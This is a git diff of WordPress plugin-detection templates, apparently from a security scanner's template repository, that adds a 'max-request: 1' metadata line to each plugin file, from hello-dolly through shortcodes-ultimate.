tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- 